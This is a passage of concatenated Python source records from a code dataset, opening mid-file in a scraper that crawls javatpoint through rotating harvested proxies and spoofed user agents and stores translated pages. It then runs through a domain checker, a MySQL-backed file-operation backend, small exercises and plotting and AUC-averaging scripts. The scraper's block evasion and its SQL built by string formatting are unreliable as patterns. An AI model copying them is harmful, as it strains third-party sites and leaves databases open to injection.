'Accept-Encoding': 'gzip'}\n            req = requests.get(url=url, headers=headers)\n            html_doc = req.text\n            jsons = json.loads(html_doc)\n            return jsons['data'][0]['dst']\n        except Exception as e:\n            print(e)\n            print('\\033[1;31m' + 'Retrying sentence translation: ' + '\\033[0m' + word)\n            count += 1\n            return word\n            # translate(word, count)\n    else:\n        return word\n\n\n# Text translation control\ndef translate_handler(string, name):\n    end = 0\n    while string.find('<' + name + '>', end) != -1:\n        start = string.find('<' + name + '>', end)\n        end = string.find('</' + name + '>', start)\n        word = string[start + len(name) + 2:end]\n        trans_word = translate(word, 0)\n        string = string[:start + len(name) + 2] + trans_word + string[end:]\n        end = start + len(name) + 2 + len(trans_word)\n    # print(string)\n    return string\n\n\n# Randomly pick a proxy IP-----------------------------------------------------------------------------------------------\ndef getproxyip(ip_file):\n    fo = open(ip_file, 'r')\n    proxys = fo.read().split('\\n')\n    proxy = ast.literal_eval(random.choice(proxys))\n    print(proxy)\n    fo.close()\n    return proxy\n\n\n# Randomly pick request headers\ndef getheaders():\n    user_agents = [\n        'Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11',\n        'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',\n        'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',\n        'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.12) Gecko/20070731 Ubuntu/dapper-security Firefox/1.5.0.12',\n        \"Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.7 (KHTML, like Gecko) Ubuntu/11.04 Chromium/16.0.912.77 Chrome/16.0.912.77 Safari/535.7\",\n        \"Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:10.0) Gecko/20100101 Firefox/10.0 \"]\n    user_agent = random.choice(user_agents)\n    print(user_agent)\n    headers = {\n        'User-Agent': user_agent,\n        'Accept-Encoding': 'gzip'}\n    return headers\n\n\n# Fetch the main page content\ndef 
getHTML(pageAddress, count):\n    print(\"Reading current URL: \" + pageAddress)\n    if count <= 6:\n        socket.setdefaulttimeout(20)  # set the global timeout\n        try:\n            proxy_support = urllib.request.ProxyHandler(getproxyip('proxy_ip_javatpoint.txt'))\n            opener = urllib.request.build_opener(proxy_support)\n            opener.addheaders = [getheaders()]\n            urllib.request.install_opener(opener)\n            res = urllib.request.urlopen(pageAddress).read()\n            # req = requests.get(url=pageAddress, headers=getheaders())\n            # res = req.text\n            # create a BeautifulSoup parser object\n            soup = BeautifulSoup(res, \"html.parser\")\n            # grab the main content block\n            contents = soup.select('div#city')\n            nextName = soup.select('a.next')[0]['href']\n            fileName = pageAddress[pageAddress.rindex('/') + 1:]\n            # extract and stitch together images?\n            # images = soup.select('div#city > img')\n            # category info handling\n            # classify_page = soup.select('#link > div > ul > a')\n            # print(classify_page)\n            # if len(classify_page) >= 1 :\n            #     classify = classify_page[0].get_text()\n            classify = 'python'\n            print('Parsed the page and got its main content: ' + fileName)\n            content = \"\".join('%s' % id for id in contents)\n            # hand the main page info over for processing\n            page_info = [fileName, nextName, content, classify]\n            content_handler(page_info)\n            # recurse into the next page\n            nextPage(nextName)\n        except Exception as e:\n            print(e)\n            print('\\033[1;31m' + 'Retrying page connection, attempt ' + str(count + 1) + '\\033[0m')\n            count += 1\n            getHTML(pageAddress, count)\n    else:\n        proxy_ip = open('proxy_ip_javatpoint.txt', 'w')  # truncate the file that stores valid IPs\n        proxy_ip.close()  # close the file\n        print(\"Re-fetching and generating proxy IP addresses\")\n        get_proxyip()\n        # retry the crawl with the fresh proxies\n        getHTML(pageAddress, 0)\n\n\n# Find the next page\ndef nextPage(nextName):\n    pageAddress = 'https://www.javatpoint.com/' + nextName\n    getHTML(pageAddress, 0)\n\n\n# Spider: store pages\ndef spider_file():\n    pass\n\n\n# spider control\ndef spider_handle():\n    pass\n\n\n# Database control\ndef sql_handler(item):\n    if sql_repeat(item[0]):\n        next_title = item[4]\n        classify = item[5]\n        update_time = time.strftime(\"%Y-%m-%d\", time.localtime())\n        replacesql = \"REPLACE INTO `t_javatpoint_test` \" \\\n                     \"(`title`, `url`, `english_content`, `translate_content`, `next_title`, `classify`, `update_time`) \" \\\n                     \"VALUES ('%s', '%s', '%s', '%s', '%s', '%s', '%s')\" \\\n                     % (item[0], item[1], item[2], item[3], next_title, classify, update_time)\n        # print(replacesql)\n        baseoperation(replacesql)\n    else:\n        print('\\033[1;31m' + 'A record with the same title already exists in the database' + '\\033[0m')\n\n\n# Raw per-line processing of the page content\ndef content_row(row):\n    # strip HTML comments\n    while row.find('<!--') != -1:\n        row = row[:row.find('<!--')] + row[row.find('-->') + 3:]\n    # remove div tags\n    row = tags(row, 'div')\n    # ss = tags(ss, 'table')\n    # ss = tags(ss, 'tr')\n    # ss = tags(ss, 'td')\n    row = tags(row, 'strong')\n    row = tags(row, 'b')\n    row = tags(row, 'B')\n    row = tag(row, 'br')\n    row = remove_attribute(row, 'h1')\n    row = remove_attribute(row, 'h2')\n    row = remove_attribute(row, 'h3')\n    row = remove_attribute(row, 'h4')\n    row = remove_attribute(row, 'h5')\n    row = remove_attribute(row, 'a')\n    row = remove_attribute(row, 'span')\n    row = remove_attribute(row, 'table')\n    row = remove_attribute(row, 'tr')\n    row = remove_attribute(row, 'td')\n    # escape ' and \" so the row can be stored safely\n    row = row.replace('\\'', '\\\\\\'')\n    row = row.replace('\\\"', '\\\\\\\"')\n    # translate\n    # ss = translate_handler(ss, 'p')\n    trans_row = translate_handler(row, 'h2')\n    trans_row = translate_handler(trans_row, 'p')\n    return [row, trans_row]\n\n\n# Whole-page content processing\ndef content_handler(content_info):\n    filename = content_info[0]\n    nextfilename = content_info[1]\n    page_content = content_info[2]\n    classify = content_info[3]\n    new_content = []\n    new_content_trans = []\n    item = []\n    content_rows = page_content.split('\\n')\n    for row in content_rows:\n        rows = content_row(row)\n        if len(rows[0]) >= 1:\n            
new_content.append(rows[0])\n            new_content_trans.append(rows[1])\n    content = \"\".join(new_content)\n    content_trans = \"\".join(new_content_trans)\n    print(\"Byte length of the page body after processing: \" + str(len(content)))\n    url = 'https://www.javatpoint.com/' + filename\n    item.append(filename)\n    item.append(url)\n    item.append(content)\n    item.append(content_trans)\n    item.append(nextfilename)\n    item.append(classify)\n    print('Page processing finished, importing into the database')\n    sql_handler(item)\n\n\n# Define a function for the threads\ndef print_time(threadName, delay):\n    count = 0\n    while count < 5:\n        time.sleep(delay)\n        count += 1\n        print(\"%s: %s\" % (threadName, time.ctime(time.time())))\n\n\n# Multithreading control\ndef thread_handler():\n    # create two threads\n    count = 0\n    try:\n        if count < 5:\n            threading.Lock().acquire()\n            _thread.start_new_thread(print_time, (\"Thread-1\", 2,))\n            threading.Lock().release()\n            _thread.start_new_thread(print_time, (\"Thread-2\", 4,))\n\n    except:\n        print(\"Error: unable to start thread\")\n    while 1:\n        pass\n\n\n# Generate the proxy IP address file\ndef get_proxyip():\n    # scrape proxy IPs\n    ip_totle = []\n    for page in range(2, 12):\n        # url = 'http://ip84.com/dlgn/' + str(page)\n        url = 'https://www.xicidaili.com/wn/' + str(page)  # Xici proxy site\n        headers = {'Accept-Encoding': 'gzip',\n                   'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36'}\n        req = requests.get(url=url, headers=headers)\n        content = req.text\n        print('Fetched proxy IP page:', page)\n        pattern = re.compile('<td>(\\d.*?)</td>')  # capture cell content between <td> and </td> whose first character is a digit\n        ip_page = re.findall(pattern, str(content))\n        ip_totle.extend(ip_page)\n        time.sleep(random.choice(range(1, 3)))\n\n    # normalize the proxy IP format\n    proxys = []\n    for i in range(0, len(ip_totle), 4):\n        proxy_host = ip_totle[i] + ':' + ip_totle[i + 1]\n        proxy_temp = {\"https\": proxy_host}\n        proxys.append(proxy_temp)\n    print(proxys)\n    # validate with multiple threads\n    threads = []\n    for i in range(len(proxys)):\n        thread = threading.Thread(target=test, args=(proxys, i))\n        threads.append(thread)\n        thread.start()\n    # block the main process until all child threads finish\n    for thread in threads:\n        thread.join()\n\n\n# Verify that a proxy IP actually works\ndef test(proxys, i):\n    lock = threading.Lock()  # create a lock\n    socket.setdefaulttimeout(10)  # set the global timeout\n    url = \"https://www.javatpoint.com\"  # the site we plan to crawl https://fanyi.baidu.com/transapi https://www.javatpoint.com\n    try:\n        proxy_support = urllib.request.ProxyHandler(proxys[i])\n        opener = urllib.request.build_opener(proxy_support)\n        opener.addheaders = [(\"User-Agent\", \"Mozilla/5.0 (Windows NT 10.0; WOW64)\")]\n        urllib.request.install_opener(opener)\n        res = urllib.request.urlopen(url).read()\n        lock.acquire()  # acquire the lock\n        print(proxys[i], 'is OK')\n        proxy_ip = open('proxy_ip_javatpoint.txt', 'a')  # open the file that stores valid IPs for appending\n        proxy_ip.write('%s\\n' % str(proxys[i]))  # write this proxy IP\n        proxy_ip.close()  # close the file\n        lock.release()  # release the lock\n    except Exception as e:\n        lock.acquire()\n        print(proxys[i], e)\n        lock.release()\n\n\nif __name__ == '__main__':\n    target = 'https://www.javatpoint.com/numpy-string-functions'\n    getHTML(target, 0)\n    # thread_handler()\n","repo_name":"iwangchuanli/Project-experience","sub_path":"python/python-百度翻译调用/Baidu_translate/com/translate/baidu/javaTpoint.py","file_name":"javaTpoint.py","file_ext":"py","file_size_in_byte":13913,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"21"}
{"seq_id":"6637750164","text":"from domainFinder import DomainFinder\n\nextension = \".com\"\n\nfreeWebsites = []\n\nwith open('words.txt') as f, open('taken.txt', \"a+\", buffering=1) as taken, open('free.txt', \"a+\", buffering=1) as free:\n    # try:\n    words = [line.rstrip() for line in f]\n    taken.seek(0)\n    
free.seek(0)\n takenDomains = [line.rstrip() for line in taken]\n freedomains = [line.rstrip() for line in free]\n print(takenDomains)\n print(freedomains)\n for firstWord in words:\n if firstWord.startswith('-'):\n continue\n for secondWord in words:\n if not secondWord.endswith(\"-\"):\n name = firstWord.replace(\"\\n\", \"\").replace(\"-\", \"\") + secondWord.replace('\\n', \"\").replace(\"-\",\n \"\") + extension\n\n if name not in takenDomains and name not in freedomains:\n print(name)\n if not DomainFinder.domainExsit(name):\n print(name)\n if DomainFinder.ensureFreeDomain(name):\n free.write(name + \"\\n\")\n freeWebsites.append(name)\n else:\n taken.write(name + \"\\n\")\n else:\n taken.write(name + \"\\n\")\n# except Exception as e:\n# print(e)\n# taken.close()\n# free.close()\n\nprint(freeWebsites)\n","repo_name":"atipezda/findThatDomain","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39349909418","text":"y = [ i for i in range(10) ]\n\nprint(y)\n\n#nested loops\na=1\nb=1\nc= 2\nn=3\n\ny = [ [i,j,k ] for i in range(a+1) for j in range(b+1) for k in range(c+1) ]\n\nz = [ i for i in y if sum(i)!=3]\nprint(y)\nprint('z',z)\n\n\nl1 = ['a', 'b', 'c', 'd', 'e', 'a', 'c']\nl2 = [ x if x in 'abcdef' else 'xx' for x in l1 ]\n\nprint(l2)","repo_name":"salokesh99/practice","sub_path":"list_comprehension.py","file_name":"list_comprehension.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43579891555","text":"import sys\nimport collections\nimport logging\n\nfrom dynamo.fileop.base import FileQuery\nfrom dynamo.fileop.transfer import FileTransferOperation, FileTransferQuery\nfrom dynamo.fileop.deletion import FileDeletionOperation, FileDeletionQuery\nfrom dynamo.utils.interface.mysql import MySQL\nfrom dynamo.dataformat import File\n\nLOG = logging.getLogger(__name__)\n\nclass StandaloneFileOperation(FileTransferOperation, FileTransferQuery, FileDeletionOperation, FileDeletionQuery):\n \"\"\"\n Interface to in-house transfer & deletion daemon using MySQL for bookkeeping.\n \"\"\"\n\n def __init__(self, config):\n FileTransferOperation.__init__(self, config)\n FileTransferQuery.__init__(self, config)\n FileDeletionOperation.__init__(self, config)\n FileDeletionQuery.__init__(self, config)\n\n self.db = MySQL(config.db_params)\n\n def num_pending_transfers(self): #override\n # FOD can throttle itself.\n return 0\n\n def num_pending_deletions(self): #override\n # FOD can throttle itself.\n return 0\n\n def form_batches(self, tasks): #override\n if len(tasks) == 0:\n return []\n\n if hasattr(tasks[0], 'source'):\n # These are transfer tasks\n by_endpoints = collections.defaultdict(list)\n for task in tasks:\n endpoints = (task.source, task.subscription.destination)\n by_endpoints[endpoints].append(task)\n\n return by_endpoints.values()\n else:\n by_endpoint = collections.defaultdict(list)\n for task in tasks:\n by_endpoint[task.desubscription.site].append(task)\n\n return by_endpoint.values()\n\n def start_transfers(self, batch_id, batch_tasks): #override\n if len(batch_tasks) == 0:\n return {}\n\n result = {}\n\n # tasks should all have the same source and destination\n source = batch_tasks[0].source\n destination = batch_tasks[0].subscription.destination\n\n fields = ('id', 'source', 'destination', 'checksum_algo', 'checksum')\n\n def 
yield_task_entry():\n for task in batch_tasks:\n lfile = task.subscription.file\n lfn = lfile.lfn\n source_pfn = source.to_pfn(lfn, 'gfal2')\n dest_pfn = destination.to_pfn(lfn, 'gfal2')\n\n if source_pfn is None or dest_pfn is None:\n # either gfal2 is not supported or lfn could not be mapped\n result[task] = False\n continue\n\n if self.checksum_algorithm:\n checksum = (self.checksum_algorithm, str(lfile.checksum[self.checksum_index]))\n else:\n checksum = (None, None)\n\n result[task] = True\n yield (task.id, source_pfn, dest_pfn) + checksum\n\n if not self._read_only:\n sql = 'INSERT INTO `standalone_transfer_batches` (`batch_id`, `source_site`, `destination_site`) VALUES (%s, %s, %s)'\n self.db.query(sql, batch_id, source.name, destination.name)\n self.db.insert_many('standalone_transfer_tasks', fields, None, yield_task_entry())\n\n LOG.debug('Inserted %d entries to standalone_transfer_tasks for batch %d.', len(batch_tasks), batch_id)\n\n return result\n\n def start_deletions(self, batch_id, batch_tasks): #override\n if len(batch_tasks) == 0:\n return {}\n\n result = {}\n\n # tasks should all have the same target site\n site = batch_tasks[0].desubscription.site\n\n fields = ('id', 'file')\n\n def yield_task_entry():\n for task in batch_tasks:\n lfn = task.desubscription.file.lfn\n pfn = site.to_pfn(lfn, 'gfal2')\n\n if pfn is None:\n # either gfal2 is not supported or lfn could not be mapped\n result[task] = False\n continue\n\n result[task] = True\n yield (task.id, pfn)\n\n if not self._read_only:\n sql = 'INSERT INTO `standalone_deletion_batches` (`batch_id`, `site`) VALUES (%s, %s)'\n self.db.query(sql, batch_id, site.name)\n self.db.insert_many('standalone_deletion_tasks', fields, None, yield_task_entry())\n\n LOG.debug('Inserted %d entries to standalone_deletion_tasks for batch %d.', len(batch_tasks), batch_id)\n\n return result\n\n def cancel_transfers(self, task_ids): #override\n return self._cancel(task_ids, 'transfer')\n\n def cancel_deletions(self, task_ids): #override\n return self._cancel(task_ids, 'deletion')\n\n def cleanup(self): #override\n sql = 'DELETE FROM f USING `standalone_transfer_tasks` AS f LEFT JOIN `transfer_tasks` AS t ON t.`id` = f.`id` WHERE t.`id` IS NULL'\n self.db.query(sql)\n sql = 'DELETE FROM f USING `standalone_deletion_tasks` AS f LEFT JOIN `deletion_tasks` AS t ON t.`id` = f.`id` WHERE t.`id` IS NULL'\n self.db.query(sql)\n sql = 'DELETE FROM f USING `standalone_transfer_batches` AS f LEFT JOIN `transfer_batches` AS t ON t.`id` = f.`batch_id` WHERE t.`id` IS NULL'\n self.db.query(sql)\n sql = 'DELETE FROM f USING `standalone_deletion_batches` AS f LEFT JOIN `deletion_batches` AS t ON t.`id` = f.`batch_id` WHERE t.`id` IS NULL'\n self.db.query(sql)\n\n # Delete the source tasks - caution: wipes out all tasks when switching the operation backend\n sql = 'DELETE FROM t USING `transfer_tasks` AS t'\n sql += ' LEFT JOIN `standalone_transfer_tasks` AS f ON f.`id` = t.`id`'\n sql += ' WHERE f.`id` IS NULL'\n self.db.query(sql)\n sql = 'DELETE FROM t USING `deletion_tasks` AS t'\n sql += ' LEFT JOIN `standalone_deletion_tasks` AS f ON f.`id` = t.`id`'\n sql += ' WHERE f.`id` IS NULL'\n self.db.query(sql)\n\n def get_transfer_status(self, batch_id): #override\n return self._get_status(batch_id, 'transfer')\n\n def get_deletion_status(self, batch_id): #override\n return self._get_status(batch_id, 'deletion')\n\n def write_transfer_history(self, history_db, task_id, history_id): #override\n pass\n\n def write_deletion_history(self, history_db, task_id, 
history_id): #override\n        pass\n\n    def forget_transfer_status(self, task_id): #override\n        return self._forget_status(task_id, 'transfer')\n\n    def forget_deletion_status(self, task_id): #override\n        return self._forget_status(task_id, 'deletion')\n\n    def forget_transfer_batch(self, batch_id): #override\n        return self._forget_batch(batch_id, 'transfer')\n\n    def forget_deletion_batch(self, batch_id): #override\n        return self._forget_batch(batch_id, 'deletion')\n\n    def _cancel(self, task_ids, optype):\n        sql = 'UPDATE `standalone_{op}_tasks` SET `status` = \\'cancelled\\''.format(op = optype)\n        self.db.execute_many(sql, 'id', task_ids, ['`status` IN (\\'new\\', \\'queued\\')'])\n\n    def _get_status(self, batch_id, optype):\n        sql = 'SELECT q.`id`, a.`status`, a.`exitcode`, a.`message`, UNIX_TIMESTAMP(a.`start_time`), UNIX_TIMESTAMP(a.`finish_time`) FROM `standalone_{op}_tasks` AS a'\n        sql += ' INNER JOIN `{op}_tasks` AS q ON q.`id` = a.`id`'\n        sql += ' WHERE q.`batch_id` = %s'\n        sql = sql.format(op = optype)\n\n        return [(i, FileQuery.status_val(s), c, m, t, f) for (i, s, c, m, t, f) in self.db.xquery(sql, batch_id)]\n\n    def _forget_status(self, task_id, optype):\n        if self._read_only:\n            return\n\n        sql = 'DELETE FROM `standalone_{op}_tasks` WHERE `id` = %s'.format(op = optype)\n        self.db.query(sql, task_id)\n\n    def _forget_batch(self, batch_id, optype):\n        if self._read_only:\n            return\n\n        sql = 'DELETE FROM `standalone_{op}_batches` WHERE `batch_id` = %s'\n        self.db.query(sql.format(op = optype), batch_id)\n","repo_name":"SmartDataProjects/dynamo","sub_path":"lib/fileop/impl/standalone.py","file_name":"standalone.py","file_ext":"py","file_size_in_byte":7910,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
{"seq_id":"32142441862","text":"import csv\n\nendlist = []\nwith open('text.txt') as f:\n    lines = f.read().splitlines()\nfor line in lines:\n\tres = line.split()\n\tres = [res[0], res[1], float(res[2])*1.5]\n\tres = [res[0], res[1], str(res[2])]\n\t#print(res)\n\tendlist.append(res)\n#print(endlist)\n\nf = open('margfaldadnut.txt', 'w')\nfor item in endlist:\n\tline = (' ').join(item)\n\ta=line+'\\n'\n\tf.write(a)\nf.close()","repo_name":"siggigauti/Adgerdagreining_Lokaverkefni","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"1147820701","text":"# Problem: https://school.programmers.co.kr/learn/courses/30/lessons/42586?language=python3\n# Time complexity: O(n^2)\n# To improve: rewrite it as O(n) (this version still passes)\ndef solution(progresses, speeds):\n    days = []\n    for idx, progress in enumerate(progresses):\n        finish_day = (100 - progress) // speeds[idx]\n        if progress + (finish_day * speeds[idx]) < 100:\n            finish_day += 1\n        days.append(finish_day)\n\n    answer = []\n    cnt = 1\n    first = days[0]\n    for i in range(1, len(days)):\n        if first < days[i]:\n            answer.append(cnt)\n            first = days[i]\n            cnt = 0\n        cnt += 1\n    answer.append(cnt)\n    return answer\n    \n\nprint(solution([93, 30, 55], [1, 30, 5]))","repo_name":"julia0926/TIL_Algo","sub_path":"Study/Programmers_lv2/42586_기능개발.py","file_name":"42586_기능개발.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"24935466411","text":"class Solution(object):\n    def maxAreaOfIsland(self, grid):\n\n\n        # This solution is incorrect. 
It solves a different problem: it computes the maximum area of squares.\n        # Walk the rows, accumulating the result into one shared row (column). On a 1 we increment; on a 0 we reset back to 0.\n        max_area = 0\n        column = [0] * len(grid[0])\n\n        for k in range(len(grid)):\n            area = 0\n\n            for i in range(len(grid[0])):\n                if grid[k][i] == 1:\n                    column[i] += 1\n                else:\n                    column[i] = 0\n\n                if column[i] == 0:\n                    max_area = max(max_area, area)\n                    area = 0\n                else:\n                    area += column[i]\n\n            max_area = max(max_area, area)\n\n        return max_area\n\n# T -O(R*C)\n# S - O(R*C)\n\n    # The correct solution. Walk the rows and explore every direction at once: up, down, left and right. If there is a 1 there, keep going.\n    def maxAreaOfIsland2(self, grid):\n\n        max_area = 0\n        for k in range(len(grid)):\n            for i in range(len(grid[0])):\n                if grid[k][i] == 1:\n                    max_area = max(max_area, self.AreaOfIsland(grid, k, i))\n\n        return max_area\n\n\n    def AreaOfIsland(self, grid, k, i):\n\n        # Base conditions: stay inside the bounds, and the cell must equal 1\n        if k >= 0 and k < len(grid) and i >= 0 and i < len(grid[0]) and grid[k][i] == 1:\n\n            # Mark the cell so the recursive function is never called on it again\n            grid[k][i] = -1\n\n            # Recurse in all four directions (up, down, left, right) and add one to the area total\n            return 1 + self.AreaOfIsland(grid, k - 1, i) + self.AreaOfIsland(grid, k + 1, i) + self.AreaOfIsland(grid, k, i - 1) + self.AreaOfIsland(grid, k, i + 1)\n\n        return 0\n\n# T -O(R*C) - there are questions here. The counter of the outer function runs O(R*C) in any case. In the worst case (all 1s), the recursion is triggered only once, but it covers everything, which is R*C.\n# After that it simply never enters the recursion again, yet it still runs the outer loop anyway, even though it does nothing there.\n# Worst case: the recursion from the first element is 1 * R*C, plus running the outer loop idly is R*C. That gives 1 * R*C + R*C = R*C.\n# Probably R*C + R*C = O(R*C)\n# S - O(R*C) - we pass the grid down the recursion stack.\n\n\nsol = Solution()\ncandidates = [[1,1],\n              [0,1]]\n\n\n\nprint(sol.maxAreaOfIsland2(candidates))\n","repo_name":"beninghton/notGivenUpToG","sub_path":"Arrays/695. 
Max Area of Island.py","file_ext":"py","file_size_in_byte":3317,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71866668534","text":"import matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom matplotlib import rc\nfrom matplotlib import rcParams\n\nrcParams.update({'figure.autolayout': True})\nmpl.rcParams['text.latex.preamble']=[r\"\\usepackage{amssymb}\",\n r\"\\usepackage{amsmath}\",\n r\"\\usepackage{bm}\"]\nplt.rc('font',**{'family':'sans-serif','sans-serif':['Helvetica']})\n## for Palatino and other serif fonts use:\n#plt.rc('font',**{'family':'serif','serif':['Palatino']})\n#plt.rc('font',**{'family':'serif','serif':['Times New Roman']})\nplt.rc('text', usetex=True);\n#plt.rcParams['savefig.facecolor'] = \"0.8\"\n\nfont_legend = 18;\nfont_fig = 20;\nms_size_1 = 12.0;\nms_size_2 = 12.0;\nms_size_3 = 12.0;\nms_size_4 = 12.0;\nline_size_1 = 2.0;\nline_size_2 = 2.0;\nline_size_3 = 2.0;\nline_size_4 = 2.0;\ntl_font_size = 30;\n\nleg_1 = '--rs';\nleg_2 = '--b>';\nleg_3 = 'rd';\nleg_4 = 'b+';\n\n \ncol_1 = 'r';\ncol_2 = 'b';\ncol_3 = 'r';\ncol_4 = 'b';\n\ncolorAndNodeTypeArray = ['-rs', '-b>', '-go', '-k*', '-c*', '-m*']\n\n#load data from file\noutputFolder_path = 'Result/pic'\nfolder_path = 'Result/ErrorRate'\nfor index in range(1,3):\n\tnumberOfTag = 50 * index\n\tfolder_Name = \"1000_{}_30\".format(numberOfTag)\n\n\tmpl.rcParams.update({'font.size': font_fig})\n\tfig = plt.figure()\n\tax = fig.add_subplot(1,1,1)\n\n\tfor index in range(0,6):\n\t\terrorRate = 10 * index\n\t\tfileName = \"ErrorRateTest_{}\".format(errorRate)\n\t\tfile_path = folder_path + '/' + folder_Name + '/' + fileName + '.txt'\n\t\topen_file = open(file_path, \"r\")\n\t\tx_node = []\n\t\ty_responseTime = []\n\t\tfor line in open_file:\n\t\t\ttempStr = line.split()\n\t\t\tx_node.append(tempStr[0])\n\t\t\ty_responseTime.append(tempStr[1])\n\t\topen_file.close()\n\n\t\t#plt.plot(x_Ratio,y_responseTime) \n\t\tlabelName = \"{}\".format(errorRate)\n\t\t#plt.plot(x_node, y_responseTime, color=colorArray[index], linewidth=1.5, linestyle=\"-\", label=labelName)\n\t\tplt.plot(x_node, y_responseTime, colorAndNodeTypeArray[index], linewidth=line_size_3, ms=ms_size_3, label=labelName)\n\n\t\tplt.legend(loc='upper left', ncol=3)\n\t\tplt.xticks(np.arange(0,900,100))\n\t\t#xlim_Max = 900;\n\t\t#xlim_Min = 0;\n\t\t#plt.xlim(xlim_Min,xlim_Max)\n\t\t# plt.ylim(0,50)\n\t\tplt.ylim(0,30)\n\t\tplt.xlabel(\"Number of Nodes\") \n\t\tplt.ylabel(\"Response Time\") \n\n\t# plt.grid()\n\tax.yaxis.grid(True, linestyle='-', which='major', color='lightgray', alpha=0.5)\n\tpic_filePath = outputFolder_path + '/errorRate_' + str(numberOfTag) + '.png'\n\tplt.savefig(pic_filePath,dpi=300,format=\"png\") \n\tplt.clf()\n\tplt.cla()\n\tplt.close()\n\t#plt.show() \t\t","repo_name":"lukeafang/drawChart","sub_path":"drawResult_ErrorRate.py","file_name":"drawResult_ErrorRate.py","file_ext":"py","file_size_in_byte":2538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19473050188","text":"import os\nimport sys\nimport json\nsys.path.append(\"./DataProcessor/\")\nfrom public import *\n\nTmpDir = \"./data/LCData/\"\n\ndef getAverage(dataset,model):\n\n if dataset == \"bridge_algebra06\":\n dataset_name = \"bridge_algebra06_U_[20,1e9]_P_[F,1e9]_T_[2006-10-05 08-26-16,2007-06-20 13-36-57]_D_T_R_T\"\n elif dataset == \"algebra05\" :\n dataset_name = \"algebra05_U_[20,1e9]_P_[F,1e9]_T_[2005-08-30 09-50-35,2006-06-07 
11-12-38]_D_T_R_T\"\n elif(dataset == \"hdu\"):\n dataset_name = \"hdu_U_[30,3600,0.1,T]_P_[30,1e9,F,T]_T_[2018-06-01 00-00-00,2018-11-29 00-00-00]_R_T_D_T\"\n\n if(model == \"AFM\"):\n model_name = \"AFM\"\n file_name = \"results_D_5_K_5_T_0.8_I_300_A_sa.json\"\n elif(model == \"DAS3H\"): \n model_name = \"DAS3H\"\n file_name = \"results_D_5_K_5_T_0.8_I_300_A_uiswat1.json\"\n elif(model == \"DASH\"): \n model_name = \"DASH\"\n file_name = \"results_D_5_K_5_T_0.8_I_300_A_uiwat2.json\"\n elif(model == \"IRT\"): \n model_name = \"IRT\"\n file_name = \"results_D_F_K_5_T_0.8_I_300_A_ui.json\"\n elif(model == \"KTM\"): \n model_name = \"KTM\"\n file_name = \"results_D_5_K_5_T_0.8_I_300_A_iswf.json\"\n elif(model == \"MIRTb\"): \n model_name = \"MIRTb\"\n file_name = \"results_D_5_K_5_T_0.8_I_300_A_ui.json\"\n elif(model == \"PFA\"): \n model_name = \"PFA\"\n file_name = \"results_D_5_K_5_T_0.8_I_300_A_swf.json\"\n\n file_dir = os.path.join(TmpDir,dataset_name+\"/\"+\"das3h/results_KT/\"+model_name+\"/\"+file_name)\n\n\n with open(file_dir, 'r') as f:\n a = json.load(f) #此时a是一个字典对象\n maxfold = 0\n minfold = 1\n results = a[\"results\"]\n fold_0 = results[\"0\"][\"AUC\"]\n fold_1 = results[\"1\"][\"AUC\"]\n fold_2 = results[\"2\"][\"AUC\"]\n fold_3 = results[\"3\"][\"AUC\"]\n fold_4 = results[\"4\"][\"AUC\"]\n average_fold = (fold_0 + fold_1 + fold_2 + fold_3 + fold_4) / 5\n maxfold = max(maxfold,fold_0)\n maxfold = max(maxfold,fold_1)\n maxfold = max(maxfold,fold_2)\n maxfold = max(maxfold,fold_3)\n maxfold = max(maxfold,fold_4)\n minfold = min(minfold,fold_0)\n minfold = min(minfold,fold_1)\n minfold = min(minfold,fold_2)\n minfold = min(minfold,fold_3)\n minfold = min(minfold,fold_4)\n # print(average_fold,maxfold,minfold)\n\n \n if os.path.exists(\"./average_AUC.json\") == False:\n a = {'0':{}}\n average_value_dict = a['0']\n else:\n a = loadDict('./', 'average_AUC.json')\n num = len(a.keys())\n a[str(num)] = {}\n average_value_dict = a[str(num)]\n printDict(average_value_dict)\n average_value_dict[\"dataset\"] = dataset\n average_value_dict[\"model\"] = model\n average_value_dict[\"AUC_average\"] = average_fold\n average_value_dict[\"AUCdiffer_max\"] = maxfold - average_fold\n average_value_dict[\"AUCdiffer_min\"] = average_fold - minfold\n\n saveDict(a, './','average_AUC.json')\n\n\n '''with open(\"./average_AUC.json\",\"a\",encoding='utf8') as f1:\n json.dump(average_value_dict,f1,indent=4,ensure_ascii=False)\n f1.write('\\n')\n #f1.close()\n #print(\"写入文件完成...\")\n '''\n\n'''\n if os.path.exists(\"./average_AUC.json\") == False:\n with open(\"./average_AUC.json\",\"w\",encoding='utf8') as f1:\n json.dump(average_value_dict,f1,indent=4,ensure_ascii=False)\n f1.write('\\n')\n #f1.close()\n #print(\"写入文件完成...\")\n elif os.path.exists(\"./average_AUC.json\"):\n with open(\"./average_AUC.json\",\"a\",encoding='utf8') as f1:\n json.dump(average_value_dict,f1,indent=4,ensure_ascii=False)\n f1.write('\\n')\n 